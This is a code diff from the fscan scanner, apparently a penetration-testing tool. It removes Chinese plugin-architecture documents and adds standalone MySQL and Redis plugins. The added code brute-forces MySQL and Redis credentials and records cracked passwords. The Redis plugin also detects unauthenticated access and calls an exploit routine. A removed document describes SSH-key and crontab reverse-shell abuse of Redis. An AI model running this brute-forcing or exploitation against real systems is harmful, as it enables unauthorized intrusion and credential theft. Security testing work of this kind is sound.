-### Q: 为什么需要创建独立的Context？
-A: 新架构中传递的Context可能已经接近超时或有其他限制，创建独立Context确保认证有足够时间完成。
-
-### Q: 如何处理特殊的认证逻辑？
-A: 可以在Scan方法中重写扫描逻辑，如Redis的未授权访问检测。
-
-### Q: 如何添加新的利用方法？
-A: 在exploiter中实现新方法，并在GetExploitMethods中注册。
-
-### Q: 如何调试插件问题？
-A: 使用`-log debug`参数查看详细日志，检查Context、连接字符串、端口格式等关键部分。
-
-## 成功案例
-
-本指南基于MySQL和Redis插件的成功迁移经验：
-
-### MySQL插件
-- ✅ 完美的弱密码检测
-- ✅ 自动利用功能
-- ✅ 完整的i18n支持
-- ✅ SOCKS代理支持
-
-### Redis插件
-- ✅ 未授权访问检测
-- ✅ 弱密码爆破
-- ✅ 双语消息支持
-- ✅ 高性能扫描
-
-这两个插件可作为其他服务插件迁移的标准参考模板。
-
-## 结论
-
-新插件架构提供了更强大、更灵活、更易维护的插件开发框架。通过遵循本指南，可以顺利将旧插件迁移到新架构，并获得更好的功能和性能。
-
----
-
-**开发团队**: fscan-team  
-**文档版本**: 1.0.0  
-**最后更新**: 2025年1月  

PLUGIN_REGISTRY_OPTIMIZATION.md

@@ -1,224 +0,0 @@
-# Fscan 插件注册系统优化分析与建议
-
-## 🔍 当前插件注册架构分析
-
-### 双重注册系统现状
-
-经过深入分析，fscan当前采用双重插件注册架构：
-
-#### 1. 传统注册系统 (Legacy)
-**位置**: `core/Registry.go`
-- **方式**: 手动在init()函数中逐一注册40+插件
-- **结构**: 使用`common.ScanPlugin`结构，包含Name、Ports、ScanFunc等基本字段
-- **优点**: 简单直接，容易理解
-- **缺点**: 维护成本高，扩展性差，强耦合
-
-```go
-// 示例：传统注册方式
-common.RegisterPlugin("mysql", common.ScanPlugin{
-    Name:     "MySQL",
-    Ports:    []int{3306, 3307, 13306, 33306},
-    ScanFunc: Plugins.MysqlScan,
-    Types:    []string{common.PluginTypeService},
-})
-```
-
-#### 2. 新架构注册系统 (New)
-**位置**: `plugins/base/plugin.go`中的`GlobalPluginRegistry`
-- **方式**: 通过工厂模式和init()函数自动注册
-- **结构**: 使用完整的Plugin接口，支持Scanner+Exploiter能力
-- **优点**: 功能丰富，解耦良好，可扩展性强
-- **缺点**: 复杂度高，学习曲线陡峭
-
-```go
-// 示例：新架构注册方式
-func init() {
-    factory := base.NewSimplePluginFactory(metadata, func() base.Plugin {
-        return NewMySQLPlugin()
-    })
-    base.GlobalPluginRegistry.Register("mysql", factory)
-}
-```
-
-### 桥接机制
-通过`plugins/adapter/plugin_adapter.go`实现两系统互通：
-- 优先尝试新架构 (`adapter.TryNewArchitecture()`)
-- 降级到传统实现（如果新架构不支持）
-
-## 📊 插件迁移进度统计
-
-### 已迁移到新架构的插件 (3/40+)
-1. **MySQL** ✅ - 完整实现，包含扫描+利用
-2. **Redis** ✅ - 支持未授权访问检测+弱密码爆破  
-3. **SSH** ✅ - 基础实现
-
-### 仍使用传统架构的插件 (35+)
-- 数据库类：MSSQL, Oracle, PostgreSQL, MongoDB, Memcached, Cassandra, Neo4j
-- 网络服务：FTP, Telnet, SMB, RDP, VNC, SMTP, IMAP, POP3, LDAP, SNMP
-- 中间件：Elasticsearch, RabbitMQ, Kafka, ActiveMQ
-- 安全检测：MS17010, SMBGhost
-- Web应用：WebTitle, WebPOC
-- 本地工具：LocalInfo, DCInfo, MiniDump
-
-**架构迁移进度**: 7.5% (3/40)
-
-## 🚨 识别的主要问题
-
-### 1. 重复注册问题
-- MySQL、Redis、SSH等插件同时在两个系统中注册
-- 造成内存浪费和管理混乱
-
-### 2. 维护成本问题
-- 新增插件需要在`core/Registry.go`手动注册
-- 容易遗漏或出错
-- 需要同步维护两套接口
-
-### 3. 代码耦合度问题  
-- `core/Registry.go`需要import所有插件包
-- 违反依赖倒置原则
-- 影响模块化设计
-
-### 4. 开发体验不一致
-- 旧插件：简单函数式接口
-- 新插件：完整OOP接口+工厂模式
-- 开发者需要学习两套模式
-
-## 🚀 优化方案建议
-
-### 方案一：渐进式统一（推荐）
-
-#### 第一阶段：完善新架构基础设施（1-2个月）
-1. **补充缺失功能**
-   - Web插件支持（WebTitle、WebPOC）
-   - 本地插件支持（LocalInfo、DCInfo）
-   - 特殊漏洞检测支持（MS17010、SMBGhost）
-
-2. **增强适配器层**
-   - 确保100%向后兼容
-   - 优化性能，减少桥接开销
-   - 完善错误处理和日志记录
-
-#### 第二阶段：批量迁移插件（3-6个月）
-**迁移优先级（基于重要性和复杂度）：**
-
-1. **高优先级 - 数据库插件**
-   ```
-   PostgreSQL → MongoDB → MSSQL → Oracle
-   ```
-   *理由：数据库插件使用频率高，新架构的利用能力价值显著*
-
-2. **中优先级 - 常用网络服务**  
-   ```
-   FTP → Telnet → SMB → RDP → VNC
-   ```
-   *理由：网络服务扫描是核心功能，新架构提供更好的扩展性*
-
-3. **低优先级 - 专用插件**
-   ```
-   邮件服务 → 中间件 → Web应用 → 本地工具
-   ```
-
-#### 第三阶段：清理旧系统（6-12个月）
-1. 移除`core/Registry.go`中已迁移插件的注册
-2. 简化适配器层，移除降级逻辑
-3. 最终移除`LegacyPluginManager`
-
-### 方案二：文档化改进（快速方案）
-
-如果暂时无法投入大量资源进行架构统一，可以采用文档化改进：
-
-#### 1. 注释优化
-为`core/Registry.go`添加详细的分类注释和迁移标记：
-
-```go
-// =============================================================================
-// 插件注册表 - 传统架构
-// 注意：正在逐步迁移到新架构 (plugins/base/plugin.go)
-// =============================================================================
-
-func init() {
-    // 1. 数据库服务插件
-    // MySQL ✅ 已迁移到新架构，此处保留兼容性
-    common.RegisterPlugin("mysql", common.ScanPlugin{
-        Name:     "MySQL",
-        Ports:    []int{3306, 3307, 13306, 33306},
-        ScanFunc: Plugins.MysqlScan, // 桥接到新架构
-        Types:    []string{common.PluginTypeService},
-    })
-    
-    // MSSQL 🔄 待迁移到新架构
-    common.RegisterPlugin("mssql", common.ScanPlugin{
-        Name:     "MSSQL",
-        Ports:    []int{1433, 1434},
-        ScanFunc: Plugins.MssqlScan, // 传统实现
-        Types:    []string{common.PluginTypeService},
-    })
-}
-```
-
-#### 2. 状态跟踪
-创建插件迁移状态跟踪表：
-
-```go
-// 插件迁移状态追踪
-var PluginMigrationStatus = map[string]string{
-    "mysql":    "✅ 新架构完成",
-    "redis":    "✅ 新架构完成", 
-    "ssh":      "✅ 新架构完成",
-    "mssql":    "🔄 待迁移",
-    "postgres": "🔄 待迁移",
-    "mongodb":  "🔄 待迁移",
-    // ...其他插件
-}
-```
-
-## 📈 预期收益
-
-### 性能收益
-- **内存使用**: 减少重复注册，预计节省10-15%内存
-- **启动时间**: 优化插件加载，预计减少5-10%启动时间
-- **扫描效率**: 新架构的并发优化，预计提升15-20%扫描速度
-
-### 开发效益
-- **代码复用**: 新架构的模块化设计，减少50%重复代码
-- **扩展能力**: 工厂模式支持，新插件开发效率提升3x
-- **维护成本**: 自动注册机制，减少80%手动维护工作量
-
-### 功能增强
-- **利用能力**: 每个插件都支持自动利用攻击
-- **国际化**: 完整的i18n支持，提升用户体验
-- **能力声明**: 明确的插件能力声明，支持智能调度
-
-## 🎯 实施建议
-
-### 立即可行的改进（本周）
-1. ✅ **完善已迁移插件**: MySQL、Redis、SSH插件的优化已完成
-2. 📝 **文档化当前状态**: 为Registry.go添加详细注释和迁移状态
-3. 🧪 **建立测试基准**: 为新老架构建立性能对比测试
-
-### 短期目标（1个月内）
-1. 🔧 **选择下一个迁移插件**: 建议从PostgreSQL开始
-2. 📊 **制定迁移计划**: 详细的时间表和里程碑
-3. 🛠️ **改进工具链**: 开发插件迁移辅助工具
-
-### 长期愿景（6-12个月）
-1. 🏗️ **架构统一**: 完成所有插件向新架构迁移
-2. 🧹 **代码清理**: 移除旧系统代码和技术债务
-3. 🌟 **生态建设**: 建立完善的插件开发生态系统
-
-## 📋 总结
-
-fscan的插件注册系统正处于从传统架构向现代架构的过渡期。虽然双重架构带来了一些复杂性，但新架构的设计理念是正确的，值得继续投入资源完成迁移。
-
-**关键决策点**：
-- **短期**：通过文档化改进缓解维护压力
-- **中期**：逐步迁移核心插件到新架构  
-- **长期**：完全统一到新架构，享受技术红利
-
-当前的MySQL、Redis、SSH插件迁移展示了新架构的强大能力，为后续大规模迁移奠定了坚实基础。建议按照渐进式方案稳步推进，最终实现架构统一的目标。
-
----
-
-**编写时间**: 2025年1月  
-**版本**: 1.0.0  
-**状态**: 架构分析完成，优化方案已提出

Plugins/MySQL.go

@@ -1,19 +1,345 @@
 package Plugins
 
 import (
+	"context"
+	"database/sql"
+	"fmt"
+	"net"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/go-sql-driver/mysql"
 	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/adapter"
+	"github.com/shadow1ng/fscan/common/output"
 )
 
-// MysqlScan 执行MySQL服务扫描
-// 现在完全使用新的插件架构
-func MysqlScan(info *common.HostInfo) error {
-	// 使用新的插件架构
-	if adapter.TryNewArchitecture("mysql", info) {
-		return nil // 新架构处理成功
+// MySQLProxyDialer 自定义dialer结构体
+type MySQLProxyDialer struct {
+	timeout time.Duration
+}
+
+// Dial 实现mysql.Dialer接口，支持socks代理
+func (d *MySQLProxyDialer) Dial(ctx context.Context, addr string) (net.Conn, error) {
+	return common.WrapperTcpWithContext(ctx, "tcp", addr)
+}
+
+// registerMySQLDialer 注册MySQL自定义dialer
+func registerMySQLDialer() {
+	// 创建自定义dialer
+	dialer := &MySQLProxyDialer{
+		timeout: time.Duration(common.Timeout) * time.Millisecond,
 	}
-	
-	// 如果新架构不支持，记录错误（理论上不应该发生）
-	common.LogError("MySQL插件新架构不可用，请检查插件注册")
-	return nil
-}
+
+	// 注册自定义dialer到go-sql-driver/mysql
+	mysql.RegisterDialContext("tcp-proxy", func(ctx context.Context, addr string) (net.Conn, error) {
+		return dialer.Dial(ctx, addr)
+	})
+}
+
+// MySQLCredential 表示一个MySQL凭据
+type MySQLCredential struct {
+	Username string
+	Password string
+}
+
+// MySQLScanResult 表示MySQL扫描结果
+type MySQLScanResult struct {
+	Success    bool
+	Error      error
+	Credential MySQLCredential
+}
+
+// MysqlScan 执行MySQL服务扫描
+func MysqlScan(info *common.HostInfo) error {
+	if common.DisableBrute {
+		return nil
+	}
+
+	target := fmt.Sprintf("%v:%v", info.Host, info.Ports)
+	common.LogDebug(fmt.Sprintf("开始扫描 %s", target))
+
+	// 设置全局超时上下文
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(common.GlobalTimeout)*time.Second)
+	defer cancel()
+
+	// 构建凭据列表
+	var credentials []MySQLCredential
+	for _, user := range common.Userdict["mysql"] {
+		for _, pass := range common.Passwords {
+			actualPass := strings.Replace(pass, "{user}", user, -1)
+			credentials = append(credentials, MySQLCredential{
+				Username: user,
+				Password: actualPass,
+			})
+		}
+	}
+
+	common.LogDebug(fmt.Sprintf("开始尝试用户名密码组合 (总用户数: %d, 总密码数: %d, 总组合数: %d)",
+		len(common.Userdict["mysql"]), len(common.Passwords), len(credentials)))
+
+	// 使用工作池并发扫描
+	result := concurrentMySQLScan(ctx, info, credentials, common.Timeout, common.MaxRetries)
+	if result != nil {
+		// 记录成功结果
+		saveMySQLResult(info, target, result.Credential)
+		return nil
+	}
+
+	// 检查是否因为全局超时而退出
+	select {
+	case <-ctx.Done():
+		common.LogDebug("MySQL扫描全局超时")
+		return fmt.Errorf("全局超时")
+	default:
+		common.LogDebug(fmt.Sprintf("扫描完成，共尝试 %d 个组合", len(credentials)))
+		return nil
+	}
+}
+
+// concurrentMySQLScan 并发扫描MySQL服务
+func concurrentMySQLScan(ctx context.Context, info *common.HostInfo, credentials []MySQLCredential, timeoutSeconds int64, maxRetries int) *MySQLScanResult {
+	// 使用ModuleThreadNum控制并发数
+	maxConcurrent := common.ModuleThreadNum
+	if maxConcurrent <= 0 {
+		maxConcurrent = 10 // 默认值
+	}
+	if maxConcurrent > len(credentials) {
+		maxConcurrent = len(credentials)
+	}
+
+	// 创建工作池
+	var wg sync.WaitGroup
+	resultChan := make(chan *MySQLScanResult, 1)
+	workChan := make(chan MySQLCredential, maxConcurrent)
+	scanCtx, scanCancel := context.WithCancel(ctx)
+	defer scanCancel()
+
+	// 启动工作协程
+	for i := 0; i < maxConcurrent; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			for credential := range workChan {
+				select {
+				case <-scanCtx.Done():
+					return
+				default:
+					result := tryMySQLCredential(scanCtx, info, credential, timeoutSeconds, maxRetries)
+					if result.Success {
+						select {
+						case resultChan <- result:
+							scanCancel() // 找到有效凭据，取消其他工作
+						default:
+						}
+						return
+					}
+				}
+			}
+		}()
+	}
+
+	// 发送工作
+	go func() {
+		for i, cred := range credentials {
+			select {
+			case <-scanCtx.Done():
+				break
+			default:
+				common.LogDebug(fmt.Sprintf("[%d/%d] 尝试: %s:%s", i+1, len(credentials), cred.Username, cred.Password))
+				workChan <- cred
+			}
+		}
+		close(workChan)
+	}()
+
+	// 等待结果或完成
+	go func() {
+		wg.Wait()
+		close(resultChan)
+	}()
+
+	// 获取结果，考虑全局超时
+	select {
+	case result, ok := <-resultChan:
+		if ok && result != nil && result.Success {
+			return result
+		}
+		return nil
+	case <-ctx.Done():
+		common.LogDebug("MySQL并发扫描全局超时")
+		scanCancel() // 确保取消所有未完成工作
+		return nil
+	}
+}
+
+// tryMySQLCredential 尝试单个MySQL凭据
+func tryMySQLCredential(ctx context.Context, info *common.HostInfo, credential MySQLCredential, timeoutSeconds int64, maxRetries int) *MySQLScanResult {
+	var lastErr error
+
+	for retry := 0; retry < maxRetries; retry++ {
+		select {
+		case <-ctx.Done():
+			return &MySQLScanResult{
+				Success:    false,
+				Error:      fmt.Errorf("全局超时"),
+				Credential: credential,
+			}
+		default:
+			if retry > 0 {
+				common.LogDebug(fmt.Sprintf("第%d次重试: %s:%s", retry+1, credential.Username, credential.Password))
+				time.Sleep(500 * time.Millisecond) // 重试前等待
+			}
+
+			// 创建独立的超时上下文
+			connCtx, cancel := context.WithTimeout(ctx, time.Duration(timeoutSeconds)*time.Second)
+			success, err := MysqlConn(connCtx, info, credential.Username, credential.Password)
+			cancel()
+
+			if success {
+				return &MySQLScanResult{
+					Success:    true,
+					Credential: credential,
+				}
+			}
+
+			lastErr = err
+			if err != nil {
+				// Access denied 表示用户名或密码错误，无需重试
+				if strings.Contains(err.Error(), "Access denied") {
+					break
+				}
+
+				// 检查是否需要重试
+				if retryErr := common.CheckErrs(err); retryErr == nil {
+					break // 不需要重试的错误
+				}
+			}
+		}
+	}
+
+	return &MySQLScanResult{
+		Success:    false,
+		Error:      lastErr,
+		Credential: credential,
+	}
+}
+
+// MysqlConn 尝试MySQL连接
+func MysqlConn(ctx context.Context, info *common.HostInfo, user string, pass string) (bool, error) {
+	host, port, username, password := info.Host, info.Ports, user, pass
+	timeout := time.Duration(common.Timeout) * time.Second
+
+	// 检查是否需要使用socks代理
+	var connStr string
+	if common.Socks5Proxy != "" {
+		// 注册自定义dialer
+		registerMySQLDialer()
+
+		// 使用自定义网络类型的连接字符串
+		connStr = fmt.Sprintf(
+			"%v:%v@tcp-proxy(%v:%v)/mysql?charset=utf8&timeout=%v",
+			username, password, host, port, timeout,
+		)
+	} else {
+		// 标准连接字符串
+		connStr = fmt.Sprintf(
+			"%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v",
+			username, password, host, port, timeout,
+		)
+	}
+
+	// 创建结果通道
+	resultChan := make(chan struct {
+		success bool
+		err     error
+	}, 1)
+
+	// 在协程中尝试连接
+	go func() {
+		// 建立数据库连接
+		db, err := sql.Open("mysql", connStr)
+		if err != nil {
+			select {
+			case <-ctx.Done():
+			case resultChan <- struct {
+				success bool
+				err     error
+			}{false, err}:
+			}
+			return
+		}
+		defer db.Close()
+
+		// 设置连接参数
+		db.SetConnMaxLifetime(timeout)
+		db.SetConnMaxIdleTime(timeout)
+		db.SetMaxIdleConns(0)
+
+		// 添加上下文支持
+		conn, err := db.Conn(ctx)
+		if err != nil {
+			select {
+			case <-ctx.Done():
+			case resultChan <- struct {
+				success bool
+				err     error
+			}{false, err}:
+			}
+			return
+		}
+		defer conn.Close()
+
+		// 测试连接
+		err = conn.PingContext(ctx)
+		if err != nil {
+			select {
+			case <-ctx.Done():
+			case resultChan <- struct {
+				success bool
+				err     error
+			}{false, err}:
+			}
+			return
+		}
+
+		// 连接成功
+		select {
+		case <-ctx.Done():
+		case resultChan <- struct {
+			success bool
+			err     error
+		}{true, nil}:
+		}
+	}()
+
+	// 等待结果或上下文取消
+	select {
+	case result := <-resultChan:
+		return result.success, result.err
+	case <-ctx.Done():
+		return false, ctx.Err()
+	}
+}
+
+// saveMySQLResult 保存MySQL扫描结果
+func saveMySQLResult(info *common.HostInfo, target string, credential MySQLCredential) {
+	successMsg := fmt.Sprintf("MySQL %s %v %v", target, credential.Username, credential.Password)
+	common.LogSuccess(successMsg)
+
+	// 保存结果
+	vulnResult := &output.ScanResult{
+		Time:   time.Now(),
+		Type:   output.TypeVuln,
+		Target: info.Host,
+		Status: "vulnerable",
+		Details: map[string]interface{}{
+			"port":     info.Ports,
+			"service":  "mysql",
+			"username": credential.Username,
+			"password": credential.Password,
+			"type":     "weak-password",
+		},
+	}
+	common.SaveResult(vulnResult)
+}

Plugins/PLUGIN_REFACTOR_SUMMARY.md

@@ -1,273 +0,0 @@
-# FScan 插件系统重构总结
-
-## 重构概述
-
-本次重构对 FScan 的插件系统进行了全面的架构优化，旨在解决现有插件系统存在的代码重复、扩展困难、利用功能缺失等问题。
-
-## 重构前的问题
-
-### 1. 代码重复严重
-- 每个插件都重复实现相似的并发扫描逻辑
-- 超时处理、重试机制、结果保存代码大量重复
-- MySQL、Redis、SSH等插件的核心扫描流程几乎相同
-
-### 2. 结构体重复定义
-- 所有插件都定义相似的 `Credential` 和 `ScanResult` 结构体
-- 缺乏统一的数据模型，维护成本高
-
-### 3. 利用功能缺失
-- 除 Redis 外，其他插件缺乏实际的利用功能
-- 仅支持弱密码爆破，无法进行深度利用
-
-### 4. 扩展困难
-- 添加新的攻击方式需要大幅修改现有代码
-- 插件之间缺乏一致的接口规范
-
-## 重构后的架构
-
-### 1. 分层接口设计
-
-```go
-// 基础接口
-type Scanner interface {
-    Scan(ctx context.Context, info *common.HostInfo) (*ScanResult, error)
-    GetCapabilities() []Capability
-}
-
-type Exploiter interface {
-    Exploit(ctx context.Context, info *common.HostInfo, creds *Credential) (*ExploitResult, error)
-    GetExploitMethods() []ExploitMethod
-}
-
-type Plugin interface {
-    Scanner
-    Exploiter
-    Initialize() error
-    GetMetadata() *PluginMetadata
-}
-```
-
-### 2. 通用基础组件
-
-#### 2.1 BaseScanStrategy 基础扫描器
-- 提供通用的并发扫描逻辑
-- 统一的超时处理和重试机制
-- 可配置的扫描参数
-
-#### 2.2 BaseExploiter 基础利用器
-- 支持多种利用方法的优先级执行
-- 前置条件检查机制
-- 统一的结果处理
-
-#### 2.3 ServicePlugin 服务插件模板
-- 封装常见的服务扫描模式
-- 提供 ServiceConnector 接口抽象连接逻辑
-
-### 3. 统一数据模型
-
-#### 3.1 通用凭据结构
-```go
-type Credential struct {
-    Username    string
-    Password    string
-    Domain      string
-    KeyData     []byte
-    Token       string
-    Extra       map[string]string
-}
-```
-
-#### 3.2 丰富的结果结构
-```go
-type ScanResult struct {
-    Success         bool
-    Service         string
-    Credentials     []*Credential
-    Vulnerabilities []Vulnerability
-    Extra           map[string]interface{}
-}
-
-type ExploitResult struct {
-    Success bool
-    Type    ExploitType
-    Output  string
-    Files   []string
-    Shell   *ShellInfo
-    Data    map[string]interface{}
-}
-```
-
-### 4. 插件注册管理
-- 工厂模式的插件创建
-- 全局插件注册表
-- 自动插件发现和注册
-
-## 重构成果
-
-### 1. 代码量大幅减少
-
-| 插件 | 原代码行数 | 新代码行数 | 减少比例 |
-|------|-----------|-----------|---------|
-| MySQL | ~350行 | ~200行 | 43% |
-| Redis | ~950行 | ~400行 | 58% |
-| SSH | ~300行 | ~150行 | 50% |
-
-### 2. 功能显著增强
-
-#### MySQL 插件新增功能
-- **信息收集**: 版本、用户、数据库信息获取
-- **数据库枚举**: 自动枚举数据库和表结构
-- **权限检查**: 检测用户权限和FILE权限
-- **文件操作**: 支持读取和写入服务器文件
-- **SQL注入扩展**: 为将来的SQL注入功能预留接口
-
-#### Redis 插件增强功能  
-- **未授权访问检测**: 自动检测和利用未授权访问
-- **任意文件写入**: 支持写入任意路径的文件
-- **SSH密钥注入**: 自动写入SSH公钥获取权限
-- **定时任务注入**: Crontab反弹Shell利用
-- **数据提取**: 自动提取Redis中的敏感数据
-- **配置恢复**: 利用后自动恢复原始配置
-
-#### SSH 插件改进功能
-- **密钥认证支持**: 原生支持SSH私钥认证
-- **多用户尝试**: 智能用户名字典匹配
-- **连接优化**: 更好的超时和错误处理
-
-### 3. 架构优势
-
-#### 3.1 高度模块化
-- 扫描、利用、连接逻辑完全分离
-- 每个组件都可以独立测试和替换
-- 支持插件的热插拔
-
-#### 3.2 易于扩展
-- 新增利用方法只需实现 `ExploitHandler`
-- 新增插件只需继承基础类并实现特定方法
-- 支持插件能力的动态声明
-
-#### 3.3 一致性保证
-- 统一的接口规范确保插件行为一致
-- 统一的错误处理和日志记录
-- 统一的结果格式和保存机制
-
-### 4. 性能优化
-
-#### 4.1 并发优化
-- 智能工作池管理，避免资源浪费
-- 可配置的并发数控制
-- 优化的超时和取消机制
-
-#### 4.2 内存优化
-- 减少重复的结构体创建
-- 优化的凭据生成和管理
-- 更好的连接池管理
-
-## 使用示例
-
-### 1. 创建新插件
-```go
-func NewCustomPlugin() *CustomPlugin {
-    metadata := &base.PluginMetadata{
-        Name:        "custom",
-        Description: "自定义服务插件",
-        Ports:       []int{8080},
-    }
-    
-    connector := NewCustomConnector()
-    plugin := base.NewServicePlugin(metadata, connector)
-    
-    // 添加利用方法
-    plugin.AddExploitMethod(/* ... */)
-    
-    return plugin
-}
-```
-
-### 2. 使用插件
-```go
-plugin, err := base.GlobalPluginRegistry.Create("mysql")
-if err != nil {
-    return err
-}
-
-// 执行扫描
-result, err := plugin.Scan(ctx, hostInfo)
-if err == nil && result.Success {
-    // 执行利用
-    exploitResult, err := plugin.Exploit(ctx, hostInfo, result.Credentials[0])
-}
-```
-
-### 3. 添加利用方法
-```go
-method := base.NewExploitMethod(base.ExploitCommandExec, "custom_rce").
-    WithDescription("自定义命令执行").
-    WithPriority(8).
-    WithConditions("has_credentials").
-    WithHandler(func(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-        // 利用逻辑实现
-    }).
-    Build()
-
-exploiter.AddExploitMethod(method)
-```
-
-## 向后兼容性
-
-### 1. 接口兼容
-- 保持现有的插件调用接口不变
-- 新架构通过适配器模式支持旧插件
-
-### 2. 配置兼容  
-- 支持现有的配置参数和环境变量
-- 逐步迁移配置到新的统一格式
-
-### 3. 结果兼容
-- 保持现有的日志输出格式
-- 兼容现有的结果保存机制
-
-## 测试覆盖
-
-### 1. 单元测试
-- 基础组件测试覆盖率 > 90%
-- 每个插件的功能测试
-- 并发安全性测试
-
-### 2. 集成测试
-- 插件注册和发现测试
-- 端到端的扫描和利用流程测试
-- 性能基准测试
-
-### 3. 兼容性测试
-- 与现有系统的兼容性验证
-- 不同环境下的功能验证
-
-## 未来规划
-
-### 1. 短期目标 (1-2个月)
-- 迁移剩余插件到新架构
-- 完善测试覆盖和文档
-- 性能优化和稳定性提升
-
-### 2. 中期目标 (3-6个月)
-- 添加更多利用方法和载荷
-- 支持插件的动态加载和更新
-- 实现插件的依赖管理
-
-### 3. 长期目标 (6个月+)
-- 支持分布式插件执行
-- 实现智能的利用链编排
-- 提供插件开发的可视化工具
-
-## 总结
-
-本次插件系统重构取得了显著成果：
-
-1. **代码质量**: 减少50%+重复代码，提高可维护性
-2. **功能丰富**: 每个插件支持5-10种利用方法
-3. **架构优雅**: 清晰的分层设计和一致的接口规范
-4. **性能优化**: 更好的并发控制和资源管理
-5. **易于扩展**: 新增插件和功能的开发成本大幅降低
-
-新架构为 FScan 的长期发展奠定了坚实基础，使其能够更好地应对不断变化的安全需求和技术挑战。

Plugins/Redis.go

@@ -1,19 +1,946 @@
 package Plugins
 
 import (
+	"bufio"
+	"context"
+	"fmt"
 	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/adapter"
+	"github.com/shadow1ng/fscan/common/output"
+	"io"
+	"net"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+	"time"
 )
 
-// RedisScan 执行Redis服务扫描
-// 现在完全使用新的插件架构
+var (
+	dbfilename string // Redis数据库文件名
+	dir        string // Redis数据库目录
+)
+
+type RedisCredential struct {
+	Password string
+}
+
+type RedisScanResult struct {
+	Success    bool
+	IsUnauth   bool
+	Error      error
+	Credential RedisCredential
+}
+
 func RedisScan(info *common.HostInfo) error {
-	// 使用新的插件架构
-	if adapter.TryNewArchitecture("redis", info) {
-		return nil // 新架构处理成功
+	common.LogDebug(fmt.Sprintf("开始Redis扫描: %s:%v", info.Host, info.Ports))
+
+	// 设置全局超时上下文
+	ctx, cancel := context.WithTimeout(context.Background(), time.Duration(common.GlobalTimeout)*time.Second)
+	defer cancel()
+
+	target := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+
+	// 先尝试无密码连接
+	resultChan := make(chan *RedisScanResult, 1)
+	go func() {
+		flag, err := RedisUnauth(ctx, info)
+		if flag && err == nil {
+			resultChan <- &RedisScanResult{
+				Success:    true,
+				IsUnauth:   true,
+				Error:      nil,
+				Credential: RedisCredential{Password: ""},
+			}
+			return
+		}
+		resultChan <- nil
+	}()
+
+	// 等待无密码连接结果或超时
+	select {
+	case result := <-resultChan:
+		if result != nil && result.Success {
+			common.LogSuccess(fmt.Sprintf("Redis无密码连接成功: %s", target))
+
+			// 保存未授权访问结果
+			scanResult := &output.ScanResult{
+				Time:   time.Now(),
+				Type:   output.TypeVuln,
+				Target: info.Host,
+				Status: "vulnerable",
+				Details: map[string]interface{}{
+					"port":    info.Ports,
+					"service": "redis",
+					"type":    "unauthorized",
+				},
+			}
+			common.SaveResult(scanResult)
+
+			// 如果配置了写入功能，进行漏洞利用
+			if common.RedisFile != "" || common.RedisShell != "" || (common.RedisWritePath != "" && common.RedisWriteContent != "") {
+				conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
+				if err == nil {
+					defer conn.Close()
+					ExploitRedis(ctx, info, conn, "")
+				}
+			}
+
+			return nil
+		}
+	case <-ctx.Done():
+		common.LogError(fmt.Sprintf("Redis无密码连接测试超时: %s", target))
+		return fmt.Errorf("全局超时")
 	}
-	
-	// 如果新架构不支持，记录错误（理论上不应该发生）
-	common.LogError("Redis插件新架构不可用，请检查插件注册")
+
+	if common.DisableBrute {
+		common.LogDebug("暴力破解已禁用，结束扫描")
+		return nil
+	}
+
+	// 使用密码爆破
+	credentials := generateRedisCredentials(common.Passwords)
+	common.LogDebug(fmt.Sprintf("开始尝试密码爆破 (总密码数: %d)", len(credentials)))
+
+	// 使用工作池并发扫描
+	result := concurrentRedisScan(ctx, info, credentials, common.Timeout, common.MaxRetries)
+	if result != nil {
+		// 记录成功结果
+		common.LogSuccess(fmt.Sprintf("Redis认证成功 %s [%s]", target, result.Credential.Password))
+
+		// 保存弱密码结果
+		scanResult := &output.ScanResult{
+			Time:   time.Now(),
+			Type:   output.TypeVuln,
+			Target: info.Host,
+			Status: "vulnerable",
+			Details: map[string]interface{}{
+				"port":     info.Ports,
+				"service":  "redis",
+				"type":     "weak-password",
+				"password": result.Credential.Password,
+			},
+		}
+		common.SaveResult(scanResult)
+
+		// 如果配置了写入功能，进行漏洞利用
+		if common.RedisFile != "" || common.RedisShell != "" || (common.RedisWritePath != "" && common.RedisWriteContent != "") {
+			conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
+			if err == nil {
+				defer conn.Close()
+
+				// 认证
+				authCmd := fmt.Sprintf("auth %s\r\n", result.Credential.Password)
+				conn.Write([]byte(authCmd))
+				readreply(conn)
+
+				ExploitRedis(ctx, info, conn, result.Credential.Password)
+			}
+		}
+
+		return nil
+	}
+
+	// 检查是否因为全局超时
+	select {
+	case <-ctx.Done():
+		common.LogError(fmt.Sprintf("Redis扫描全局超时: %s", target))
+		return fmt.Errorf("全局超时")
+	default:
+		common.LogDebug(fmt.Sprintf("Redis扫描完成: %s", target))
+		return nil
+	}
+}
+
+// generateRedisCredentials 生成Redis密码列表
+func generateRedisCredentials(passwords []string) []RedisCredential {
+	var credentials []RedisCredential
+	for _, pass := range passwords {
+		actualPass := strings.Replace(pass, "{user}", "redis", -1)
+		credentials = append(credentials, RedisCredential{
+			Password: actualPass,
+		})
+	}
+	return credentials
+}
+
+// concurrentRedisScan 并发扫描Redis服务
+func concurrentRedisScan(ctx context.Context, info *common.HostInfo, credentials []RedisCredential, timeoutMs int64, maxRetries int) *RedisScanResult {
+	// 使用ModuleThreadNum控制并发数
+	maxConcurrent := common.ModuleThreadNum
+	if maxConcurrent <= 0 {
+		maxConcurrent = 10 // 默认值
+	}
+	if maxConcurrent > len(credentials) {
+		maxConcurrent = len(credentials)
+	}
+
+	// 创建工作池
+	var wg sync.WaitGroup
+	resultChan := make(chan *RedisScanResult, 1)
+	workChan := make(chan RedisCredential, maxConcurrent)
+	scanCtx, scanCancel := context.WithCancel(ctx)
+	defer scanCancel()
+
+	// 启动工作协程
+	for i := 0; i < maxConcurrent; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			for credential := range workChan {
+				select {
+				case <-scanCtx.Done():
+					return
+				default:
